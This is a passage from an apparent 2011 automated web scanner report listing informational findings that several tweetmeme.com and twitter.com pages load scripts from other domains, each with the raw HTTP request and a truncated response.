Content-Length: 40219

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>    <!-- title -->
   <title>
car
...[SNIP]...
<!-- FM Tracking Pixel -->
<script type='text/javascript' src='http://static.fmpub.net/site/tweetmeme'></script>
...[SNIP]...

21.455. http://tweetmeme.com/user/cnn

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tweetmeme.com
Path:   /user/cnn

Issue detail

The response dynamically includes the following script from another domain:
  • http://static.fmpub.net/site/tweetmeme

Request

GET /user/cnn HTTP/1.1
Host: tweetmeme.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __ctl=286f8b371579253c1; __utmz=229010307.1295907700.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __csnv=2d2e35941c7237e0; tm_identity=1e736a4ffb2b89d8eb9feef196afe056; __utma=229010307.737407932.1295907700.1295907700.1295907700.1; __utmc=229010307; __csref=; __cst=c361a3372a99df5c; __qca=P0-724637325-1295907700201; __utmb=229010307.2.10.1295907700; __csv=286f8b371579253c; __qseg=Q_D|Q_T|Q_2891|Q_2867|Q_2866|Q_2865|Q_2363|Q_2362|Q_2355|Q_2353|Q_2352|Q_2349|Q_2339|Q_1286|Q_1160|Q_1159|Q_1156|Q_1149|Q_1148|Q_983;

Response

HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Tue, 25 Jan 2011 13:52:04 GMT
Content-Type: text/html
Connection: close
X-Ads-Served-In: 0.0035941600799561
X-Served-In: 0.36921310424805
X-Served-By: ded2062
Content-Length: 39102

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>    <!-- title -->
   <title>
CNN
...[SNIP]...
<!-- FM Tracking Pixel -->
<script type='text/javascript' src='http://static.fmpub.net/site/tweetmeme'></script>
...[SNIP]...

21.456. http://tweetmeme.com/user/geekytechnews

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tweetmeme.com
Path:   /user/geekytechnews

Issue detail

The response dynamically includes the following script from another domain:
  • http://static.fmpub.net/site/tweetmeme

Request

GET /user/geekytechnews HTTP/1.1
Host: tweetmeme.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __ctl=286f8b371579253c1; __utmz=229010307.1295907700.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __csnv=2d2e35941c7237e0; tm_identity=1e736a4ffb2b89d8eb9feef196afe056; __utma=229010307.737407932.1295907700.1295907700.1295907700.1; __utmc=229010307; __csref=; __cst=c361a3372a99df5c; __qca=P0-724637325-1295907700201; __utmb=229010307.2.10.1295907700; __csv=286f8b371579253c; __qseg=Q_D|Q_T|Q_2891|Q_2867|Q_2866|Q_2865|Q_2363|Q_2362|Q_2355|Q_2353|Q_2352|Q_2349|Q_2339|Q_1286|Q_1160|Q_1159|Q_1156|Q_1149|Q_1148|Q_983;

Response

HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Tue, 25 Jan 2011 13:51:07 GMT
Content-Type: text/html
Connection: close
X-Ads-Served-In: 0.0019528865814209
X-Served-In: 1.5276410579681
X-Served-By: ded2061
Content-Length: 39994

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>    <!-- title -->
   <title>
gee
...[SNIP]...
<!-- FM Tracking Pixel -->
<script type='text/javascript' src='http://static.fmpub.net/site/tweetmeme'></script>
...[SNIP]...

21.457. http://tweetmeme.com/user/lorakolodny

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tweetmeme.com
Path:   /user/lorakolodny

Issue detail

The response dynamically includes the following script from another domain:
  • http://static.fmpub.net/site/tweetmeme

Request

GET /user/lorakolodny HTTP/1.1
Host: tweetmeme.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __ctl=286f8b371579253c1; __utmz=229010307.1295907700.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __csnv=2d2e35941c7237e0; tm_identity=1e736a4ffb2b89d8eb9feef196afe056; __utma=229010307.737407932.1295907700.1295907700.1295907700.1; __utmc=229010307; __csref=; __cst=c361a3372a99df5c; __qca=P0-724637325-1295907700201; __utmb=229010307.2.10.1295907700; __csv=286f8b371579253c; __qseg=Q_D|Q_T|Q_2891|Q_2867|Q_2866|Q_2865|Q_2363|Q_2362|Q_2355|Q_2353|Q_2352|Q_2349|Q_2339|Q_1286|Q_1160|Q_1159|Q_1156|Q_1149|Q_1148|Q_983;

Response

HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Tue, 25 Jan 2011 13:52:08 GMT
Content-Type: text/html
Connection: close
X-Ads-Served-In: 0.0027039051055908
X-Served-In: 1.5502688884735
X-Served-By: h04
Content-Length: 39312

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>    <!-- title -->
   <title>
lor
...[SNIP]...
<!-- FM Tracking Pixel -->
<script type='text/javascript' src='http://static.fmpub.net/site/tweetmeme'></script>
...[SNIP]...

21.458. http://tweetmeme.com/user/mjsonly

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tweetmeme.com
Path:   /user/mjsonly

Issue detail

The response dynamically includes the following script from another domain:
  • http://static.fmpub.net/site/tweetmeme

Request

GET /user/mjsonly HTTP/1.1
Host: tweetmeme.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __ctl=286f8b371579253c1; __utmz=229010307.1295907700.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __csnv=2d2e35941c7237e0; tm_identity=1e736a4ffb2b89d8eb9feef196afe056; __utma=229010307.737407932.1295907700.1295907700.1295907700.1; __utmc=229010307; __csref=; __cst=c361a3372a99df5c; __qca=P0-724637325-1295907700201; __utmb=229010307.2.10.1295907700; __csv=286f8b371579253c; __qseg=Q_D|Q_T|Q_2891|Q_2867|Q_2866|Q_2865|Q_2363|Q_2362|Q_2355|Q_2353|Q_2352|Q_2349|Q_2339|Q_1286|Q_1160|Q_1159|Q_1156|Q_1149|Q_1148|Q_983;

Response

HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Tue, 25 Jan 2011 13:52:56 GMT
Content-Type: text/html
Connection: close
X-Ads-Served-In: 0.0020580291748047
X-Served-In: 1.6259660720825
X-Served-By: h01
Content-Length: 37195

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>    <!-- title -->
   <title>
mjs
...[SNIP]...
<!-- FM Tracking Pixel -->
<script type='text/javascript' src='http://static.fmpub.net/site/tweetmeme'></script>
...[SNIP]...

21.459. http://tweetmeme.com/user/otoolefan

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tweetmeme.com
Path:   /user/otoolefan

Issue detail

The response dynamically includes the following script from another domain:
  • http://static.fmpub.net/site/tweetmeme

Request

GET /user/otoolefan HTTP/1.1
Host: tweetmeme.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __ctl=286f8b371579253c1; __utmz=229010307.1295907700.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __csnv=2d2e35941c7237e0; tm_identity=1e736a4ffb2b89d8eb9feef196afe056; __utma=229010307.737407932.1295907700.1295907700.1295907700.1; __utmc=229010307; __csref=; __cst=c361a3372a99df5c; __qca=P0-724637325-1295907700201; __utmb=229010307.2.10.1295907700; __csv=286f8b371579253c; __qseg=Q_D|Q_T|Q_2891|Q_2867|Q_2866|Q_2865|Q_2363|Q_2362|Q_2355|Q_2353|Q_2352|Q_2349|Q_2339|Q_1286|Q_1160|Q_1159|Q_1156|Q_1149|Q_1148|Q_983;

Response

HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Tue, 25 Jan 2011 13:53:36 GMT
Content-Type: text/html
Connection: close
X-Ads-Served-In: 0.0031058788299561
X-Served-In: 1.2631268501282
X-Served-By: ded2061
Content-Length: 36088

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>    <!-- title -->
   <title>
OTO
...[SNIP]...
<!-- FM Tracking Pixel -->
<script type='text/javascript' src='http://static.fmpub.net/site/tweetmeme'></script>
...[SNIP]...

21.460. http://tweetmeme.com/user/paulcarr

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tweetmeme.com
Path:   /user/paulcarr

Issue detail

The response dynamically includes the following script from another domain:
  • http://static.fmpub.net/site/tweetmeme

Request

GET /user/paulcarr HTTP/1.1
Host: tweetmeme.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __ctl=286f8b371579253c1; __utmz=229010307.1295907700.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __csnv=2d2e35941c7237e0; tm_identity=1e736a4ffb2b89d8eb9feef196afe056; __utma=229010307.737407932.1295907700.1295907700.1295907700.1; __utmc=229010307; __csref=; __cst=c361a3372a99df5c; __qca=P0-724637325-1295907700201; __utmb=229010307.2.10.1295907700; __csv=286f8b371579253c; __qseg=Q_D|Q_T|Q_2891|Q_2867|Q_2866|Q_2865|Q_2363|Q_2362|Q_2355|Q_2353|Q_2352|Q_2349|Q_2339|Q_1286|Q_1160|Q_1159|Q_1156|Q_1149|Q_1148|Q_983;

Response

HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Tue, 25 Jan 2011 13:51:31 GMT
Content-Type: text/html
Connection: close
X-Ads-Served-In: 0.003615140914917
X-Served-In: 0.51229000091553
X-Served-By: ded2062
Content-Length: 25395

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>    <!-- title -->
   <title>
pau
...[SNIP]...
<!-- FM Tracking Pixel -->
<script type='text/javascript' src='http://static.fmpub.net/site/tweetmeme'></script>
...[SNIP]...

21.461. http://tweetmeme.com/user/reiserlaw

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tweetmeme.com
Path:   /user/reiserlaw

Issue detail

The response dynamically includes the following script from another domain:
  • http://static.fmpub.net/site/tweetmeme

Request

GET /user/reiserlaw HTTP/1.1
Host: tweetmeme.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __ctl=286f8b371579253c1; __utmz=229010307.1295907700.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __csnv=2d2e35941c7237e0; tm_identity=1e736a4ffb2b89d8eb9feef196afe056; __utma=229010307.737407932.1295907700.1295907700.1295907700.1; __utmc=229010307; __csref=; __cst=c361a3372a99df5c; __qca=P0-724637325-1295907700201; __utmb=229010307.2.10.1295907700; __csv=286f8b371579253c; __qseg=Q_D|Q_T|Q_2891|Q_2867|Q_2866|Q_2865|Q_2363|Q_2362|Q_2355|Q_2353|Q_2352|Q_2349|Q_2339|Q_1286|Q_1160|Q_1159|Q_1156|Q_1149|Q_1148|Q_983;

Response

HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Tue, 25 Jan 2011 13:53:52 GMT
Content-Type: text/html
Connection: close
X-Ads-Served-In: 0.002079963684082
X-Served-In: 2.6879899501801
X-Served-By: ded2062
Content-Length: 39563

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>    <!-- title -->
   <title>
rei
...[SNIP]...
<!-- FM Tracking Pixel -->
<script type='text/javascript' src='http://static.fmpub.net/site/tweetmeme'></script>
...[SNIP]...

21.462. http://tweetmeme.com/user/worldstar

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tweetmeme.com
Path:   /user/worldstar

Issue detail

The response dynamically includes the following script from another domain:
  • http://static.fmpub.net/site/tweetmeme

Request

GET /user/worldstar HTTP/1.1
Host: tweetmeme.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __ctl=286f8b371579253c1; __utmz=229010307.1295907700.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __csnv=2d2e35941c7237e0; tm_identity=1e736a4ffb2b89d8eb9feef196afe056; __utma=229010307.737407932.1295907700.1295907700.1295907700.1; __utmc=229010307; __csref=; __cst=c361a3372a99df5c; __qca=P0-724637325-1295907700201; __utmb=229010307.2.10.1295907700; __csv=286f8b371579253c; __qseg=Q_D|Q_T|Q_2891|Q_2867|Q_2866|Q_2865|Q_2363|Q_2362|Q_2355|Q_2353|Q_2352|Q_2349|Q_2339|Q_1286|Q_1160|Q_1159|Q_1156|Q_1149|Q_1148|Q_983;

Response

HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Tue, 25 Jan 2011 13:53:00 GMT
Content-Type: text/html
Connection: close
X-Ads-Served-In: 0.0033619403839111
X-Served-In: 0.61441087722778
X-Served-By: h02
Content-Length: 25323

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>    <!-- title -->
   <title>
WOR
...[SNIP]...
<!-- FM Tracking Pixel -->
<script type='text/javascript' src='http://static.fmpub.net/site/tweetmeme'></script>
...[SNIP]...

21.463. http://twitter.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://twitter.com
Path:   /

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://a2.twimg.com/a/1295646587/javascripts/fronts.js
  • http://a2.twimg.com/a/1295646587/javascripts/widgets/widget.js?1295901448
  • http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js

Request

GET /?q= HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 23:10:02 GMT
Server: hi
Status: 200 OK
X-Transaction: 1295910602-49620-38335
ETag: "3681f68f05a59f8a42626fdd110f0f5e"
Last-Modified: Mon, 24 Jan 2011 23:10:02 GMT
X-Runtime: 0.08485
Content-Type: text/html; charset=utf-8
Content-Length: 42958
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: k=173.193.214.243.1295910600694364; path=/; expires=Mon, 31-Jan-11 23:10:00 GMT; domain=.twitter.com
Set-Cookie: guest_id=129591060236158132; path=/; expires=Wed, 23 Feb 2011 23:10:02 GMT
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CjoMY3NyZl9pZCIlYmQ2ZWI3ZWQ4ZmJkOTQyNzE3NDdlZDQyYjBjMjM4%250AY2I6B2lkIiUyOTM4NTVjOTBiODZjZmY2YTJhMmE1ZDJkODc0MTAxNyIKZmxh%250Ac2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNoSGFzaHsABjoK%250AQHVzZWR7ADoVaW5fbmV3X3VzZXJfZmxvdzA6D2NyZWF0ZWRfYXRsKwh7hkq6%250ALQE%253D--4d7ff12d14d98e2870af1c579320deda6f99aadf; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html>
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta http-equiv="X-UA-Compatible" content="IE=8">
<meta http-equiv="Content-Type" content="text/html; ch
...[SNIP]...
</h2>

<script src="http://a2.twimg.com/a/1295646587/javascripts/widgets/widget.js?1295901448" type="text/javascript"></script>
...[SNIP]...
</div>


<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1295646587/javascripts/fronts.js" type="text/javascript"></script>
...[SNIP]...

21.464. http://twitter.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://twitter.com
Path:   /

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://a0.twimg.com/a/1295646587/javascripts/widgets/widget.js?1295653420
  • http://a2.twimg.com/a/1295646587/javascripts/fronts.js
  • http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js

Request

GET / HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 23:09:47 GMT
Server: hi
Status: 200 OK
X-Transaction: 1295910587-82359-30173
ETag: "9a6712df9e465f208b30f02c1f450eaf"
Last-Modified: Mon, 24 Jan 2011 23:09:47 GMT
X-Runtime: 0.01017
Content-Type: text/html; charset=utf-8
Content-Length: 43988
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: k=173.193.214.243.1295910586462673; path=/; expires=Mon, 31-Jan-11 23:09:46 GMT; domain=.twitter.com
Set-Cookie: guest_id=129591058790861047; path=/; expires=Wed, 23 Feb 2011 23:09:47 GMT
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CDoHaWQiJWQ2OTE2NzQ1OWNkMjZmNGJkODYxYjkwNzEzYWI0N2U0Igpm%250AbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAG%250AOgpAdXNlZHsAOg9jcmVhdGVkX2F0bCsIBk5Kui0B--357ce574d35e8822769e63fd9d1dd29f4461904b; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html>
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta http-equiv="X-UA-Compatible" content="IE=8">
<meta http-equiv="Content-Type" content="text/html; ch
...[SNIP]...
</h2>

<script src="http://a0.twimg.com/a/1295646587/javascripts/widgets/widget.js?1295653420" type="text/javascript"></script>
...[SNIP]...
</div>


<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1295646587/javascripts/fronts.js" type="text/javascript"></script>
...[SNIP]...

21.465. http://twitter.com/7News/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://twitter.com
Path:   /7News/

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://a1.twimg.com/a/1295646587/javascripts/api.js?1295654475
  • http://a1.twimg.com/a/1295646587/javascripts/lib/gears_init.js?1295654475
  • http://a1.twimg.com/a/1295646587/javascripts/lib/jquery.tipsy.min.js?1295654475
  • http://a2.twimg.com/a/1295646587/javascripts/lib/mustache.js?1295654475
  • http://a2.twimg.com/a/1295646587/javascripts/twitter.js?1295654475
  • http://a3.twimg.com/a/1295646587/javascripts/dismissable.js?1295654475
  • http://a3.twimg.com/a/1295646587/javascripts/geov1.js?1295654475
  • http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js
  • http://www.google.com/jsapi

Request

GET /7News/ HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 23:06:35 GMT
Server: hi
Status: 200 OK
X-Transaction: 1295910395-49850-63408
ETag: "85cdef8719ba6d07512d0d99ffbc30f1"
Last-Modified: Mon, 24 Jan 2011 23:06:35 GMT
X-Runtime: 0.00972
Content-Type: text/html; charset=utf-8
Content-Length: 54324
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: k=173.193.214.243.1295910394925908; path=/; expires=Mon, 31-Jan-11 23:06:34 GMT; domain=.twitter.com
Set-Cookie: guest_id=129591039585816877; path=/; expires=Wed, 23 Feb 2011 23:06:35 GMT
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CDoHaWQiJTViNzE3ZDJlNTczNWZjYjFiMDVhOWI5NmFjYTJjOWM2Igpm%250AbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAG%250AOgpAdXNlZHsAOg9jcmVhdGVkX2F0bCsI1F9Hui0B--57a878bd8dcd4b502ec0bff069b12b796c637c54; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
</div>


<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1295646587/javascripts/twitter.js?1295654475" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1295646587/javascripts/lib/jquery.tipsy.min.js?1295654475" type="text/javascript"></script>
<script type='text/javascript' src='http://www.google.com/jsapi'></script>
<script src="http://a1.twimg.com/a/1295646587/javascripts/lib/gears_init.js?1295654475" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1295646587/javascripts/lib/mustache.js?1295654475" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1295646587/javascripts/geov1.js?1295654475" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1295646587/javascripts/api.js?1295654475" type="text/javascript"></script>
...[SNIP]...
</script>
<script src="http://a2.twimg.com/a/1295646587/javascripts/lib/mustache.js?1295654475" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1295646587/javascripts/dismissable.js?1295654475" type="text/javascript"></script>
...[SNIP]...

21.466. http://twitter.com/7News/newsteam

Summary

Severity:   Information
Confidence:   Certain
Host:   http://twitter.com
Path:   /7News/newsteam

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://a0.twimg.com/a/1295646587/javascripts/geov1.js?1295653420
  • http://a0.twimg.com/a/1295646587/javascripts/lists.js?1295653420
  • http://a2.twimg.com/a/1295646587/javascripts/api.js?1295653420
  • http://a2.twimg.com/a/1295646587/javascripts/lib/gears_init.js?1295653420
  • http://a2.twimg.com/a/1295646587/javascripts/lib/jquery.tipsy.min.js?1295653420
  • http://a3.twimg.com/a/1295646587/javascripts/lib/mustache.js?1295653420
  • http://a3.twimg.com/a/1295646587/javascripts/twitter.js?1295653420
  • http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js
  • http://www.google.com/jsapi

Request

GET /7News/newsteam HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 23:05:49 GMT
Server: hi
Status: 200 OK
X-Transaction: 1295910349-62168-50610
ETag: "da817aed8ad2f932b9830e8a84480989"
Last-Modified: Mon, 24 Jan 2011 23:05:49 GMT
X-Runtime: 0.57960
Content-Type: text/html; charset=utf-8
Content-Length: 57201
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: k=173.193.214.243.1295910347880108; path=/; expires=Mon, 31-Jan-11 23:05:47 GMT; domain=.twitter.com
Set-Cookie: guest_id=129591034914123817; path=/; expires=Wed, 23 Feb 2011 23:05:49 GMT
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CjoMY3NyZl9pZCIlN2Q0ZTFiOTJmMGY0NmRjMTgyZTZkMjQ3ZTFlMjE1%250ANTk6DnJldHVybl90byImaHR0cDovL3R3aXR0ZXIuY29tLzdOZXdzL25ld3N0%250AZWFtOgdpZCIlZDI1NjgyOTUxYTU1YzRjZDc1MzNiNTE3NWVjOTllMGUiCmZs%250AYXNoSUM6J0FjdGlvbkNvbnRyb2xsZXI6OkZsYXNoOjpGbGFzaEhhc2h7AAY6%250ACkB1c2VkewA6D2NyZWF0ZWRfYXRsKwhXqUa6LQE%253D--b059b0e115ff03027e8577c5a6c0808a3211765e; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
</div>


<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1295646587/javascripts/twitter.js?1295653420" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1295646587/javascripts/lib/jquery.tipsy.min.js?1295653420" type="text/javascript"></script>
<script type='text/javascript' src='http://www.google.com/jsapi'></script>
<script src="http://a2.twimg.com/a/1295646587/javascripts/lib/gears_init.js?1295653420" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1295646587/javascripts/lib/mustache.js?1295653420" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1295646587/javascripts/geov1.js?1295653420" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1295646587/javascripts/api.js?1295653420" type="text/javascript"></script>
...[SNIP]...
</script>
<script src="http://a0.twimg.com/a/1295646587/javascripts/lists.js?1295653420" type="text/javascript"></script>
...[SNIP]...

21.467. http://twitter.com/7News/status/29619600551317504

Summary

Severity:   Information
Confidence:   Certain
Host:   http://twitter.com
Path:   /7News/status/29619600551317504

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://a0.twimg.com/a/1295646587/javascripts/geov1.js?1295653420
  • http://a2.twimg.com/a/1295646587/javascripts/api.js?1295653420
  • http://a2.twimg.com/a/1295646587/javascripts/lib/gears_init.js?1295653420
  • http://a2.twimg.com/a/1295646587/javascripts/lib/jquery.tipsy.min.js?1295653420
  • http://a3.twimg.com/a/1295646587/javascripts/lib/mustache.js?1295653420
  • http://a3.twimg.com/a/1295646587/javascripts/twitter.js?1295653420
  • http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js
  • http://www.google.com/jsapi

Request

GET /7News/status/29619600551317504 HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 23:05:53 GMT
Server: hi
Status: 200 OK
X-Transaction: 1295910353-67452-11698
ETag: "df882b3b65e14ceab1da2b4db264ec52"
Last-Modified: Mon, 24 Jan 2011 23:05:53 GMT
X-Runtime: 0.05261
Content-Type: text/html; charset=utf-8
Content-Length: 13694
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: k=173.193.214.243.1295910352494991; path=/; expires=Mon, 31-Jan-11 23:05:52 GMT; domain=.twitter.com
Set-Cookie: guest_id=129591035323884356; path=/; expires=Wed, 23 Feb 2011 23:05:53 GMT
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
